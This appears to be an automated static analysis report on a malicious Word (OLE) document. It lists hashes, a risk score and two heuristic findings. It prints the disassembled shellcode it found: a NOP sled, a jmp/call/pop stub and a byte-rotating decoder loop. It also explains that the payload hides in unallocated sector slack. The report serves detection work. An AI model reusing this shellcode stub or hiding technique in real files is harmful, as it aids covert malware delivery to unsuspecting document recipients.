Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 862fc451d368d81c…

MALICIOUS

Office (OLE)

Size: 116.4 KB
Created: 2007-09-18 04:34:00
Authoring application: Microsoft Word 11
First seen: 2015-09-18
MD5: 5aeae31d47cc8823a6cdd6dd890f02a0
SHA-1: 64f0c72dfbad690f9bcf98c9b205ff9f6917fde9
SHA-256: 862fc451d368d81cafe5ce5e01f442c07d3145c8c1951ceafdcc0471105182ce
Risk Score: 80

Malware Insights

The presence of a NOP sled and a large amount of slack space within the OLE document suggests the file likely contains obfuscated or packed malicious code, possibly shellcode. While no specific document body content or scripts were clearly extracted, these structural anomalies are strong indicators of malicious intent, potentially for exploitation or payload delivery. The SHA-256 hash is included as the primary indicator of compromise (IOC).

Heuristics (2)

  • NOP sled detected (severity: high, rule: SC_NOP_SLED)
    Found 20+ consecutive 0x90 bytes
    Disassembly
    Attempted x86 opcode disassembly
    00000C30  90                nop
    00000C31  90                nop
    00000C32  90                nop
    00000C33  90                nop
    00000C34  90                nop
    00000C35  90                nop
    00000C36  90                nop
    00000C37  90                nop
    00000C38  90                nop
    00000C39  90                nop
    00000C3A  90                nop
    00000C3B  90                nop
    00000C3C  90                nop
    00000C3D  90                nop
    00000C3E  90                nop
    00000C3F  90                nop
    00000C40  90                nop
    00000C41  90                nop
    00000C42  90                nop
    00000C43  90                nop
    00000C44  90                nop
    00000C45  90                nop
    00000C46  eb03              jmp 0xc4b
    00000C48  5e                pop esi
    00000C49  ffe6              jmp esi
    00000C4B  e8f8ffffff        call 0xc48
    00000C50  40                inc eax
    00000C51  48                dec eax
    00000C52  90                nop
    00000C53  33c9              xor ecx, ecx
    00000C55  66b90a01          mov cx, 0x10a
    00000C59  90                nop
    00000C5A  83c619            add esi, 0x19
    00000C5D  56                push esi
    00000C5E  8bfe              mov edi, esi
    00000C60  ac                lodsb al, byte ptr [esi]
    00000C61  90                nop
    00000C62  c0c004            rol al, 4
    00000C65  aa                stosb byte ptr es:[edi], al
    00000C66  49                dec ecx
    00000C67  75f7              jne 0xc60
    00000C69  c3                ret
    00000C6A  55                push ebp
    00000C6B  b8ce38cec5        mov eax, 0xc5ce38ce
    00000C70  3565757c54        xor eax, 0x547c7565
    00000C75  0f4000            cmovo eax, dword ptr [eax]
    00000C78  0000              add byte ptr [eax], al
    00000C7A  099e7d000000      or dword ptr [esi + 0x7d], ebx
    00000C80  f8                clc
    00000C81  54                push esp
    00000C82  cf                iretd
    00000C83  46                inc esi
    00000C84  1a03              sbb al, byte ptr [ebx]
    00000C86  0000              add byte ptr [eax], al
    00000C88  00b804c0b807      add byte ptr [eax + 0x7b8c004], bh
    00000C8E  c1                .byte 0xc1
    00000C8F  da                .byte 0xda
  • OLE document has large unaccounted-for region (severity: high, rule: OLE_SLACK_ANOMALY)
    OLE file is 119,152 bytes but its declared streams total only 16,486 bytes — 102,666 bytes (86%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).